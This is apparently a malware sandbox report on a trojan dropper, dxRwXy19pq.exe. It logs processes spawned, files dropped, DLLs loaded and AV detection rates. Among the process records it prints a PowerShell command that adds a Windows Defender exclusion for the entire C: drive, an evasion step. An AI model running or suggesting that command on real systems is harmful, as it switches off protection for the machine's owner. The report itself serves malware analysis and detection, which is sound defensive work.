            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00406AD4 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 0040596C appears 117 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00407904 appears 43 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403400 appears 60 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00445E48 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00457FC4 appears 77 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00457DB8 appears 102 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00434550 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403494 appears 85 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 004533B8 appears 98 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00446118 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403684 appears 229 times
            Source: dxRwXy19pq.exeStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM)
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: photorecoverylib59.exe.13.dr | Static PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-PDB6I.tmp.13.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-PDB6I.tmp.13.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-PDB6I.tmp.13.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: PhotoRecoveryLib.exe.14.dr | Static PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-N40N4.tmp.13.dr | Static PE information: Number of sections : 19 > 10
            Source: sqlite3.dll.14.dr | Static PE information: Number of sections : 19 > 10
            Source: ded120f6-6c1d-18da-bc8d-0195720b2895.exe.0.dr | Static PE information: No import functions for PE file found
            Source: 001[1].exe.0.dr | Static PE information: No import functions for PE file found
            Source: dxRwXy19pq.exe | Binary or memory string: OriginalFilename vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exe, 00000000.00000002.1329439529.000000000066D000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exe, 00000000.00000000.1214950043.000000000066D000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exe | Binary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\IV16YfWt_3288
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@26/50@0/5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D3F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,14_2_02D3F8D0
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,13_2_0045568C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,13_2_00455EB4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,14_2_004016EB
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_004025A0 CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,CloseHandle,CloseHandle,0_2_004025A0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0046E5B8 GetVersion,CoCreateInstance,13_2_0046E5B8
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_004057B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,0_2_004057B0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_0040DCE3 StartServiceCtrlDispatcherA,14_2_0040DCE3
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | File created: C:\Users\user\AppData\Local\Temp\GuardFox
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: dxRwXy19pq.exe | Virustotal: Detection: 72%
            Source: dxRwXy19pq.exe | ReversingLabs: Detection: 65%
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
            Source: unknown | Process created: C:\Users\user\Desktop\dxRwXy19pq.exe "C:\Users\user\Desktop\dxRwXy19pq.exe"
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Process created: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe "C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe"
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Process created: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe "C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe"
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Process created: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp "C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp" /SL5="$303D6,3759395,56832,C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Process created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe "C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe" -i
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mccsusershared.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
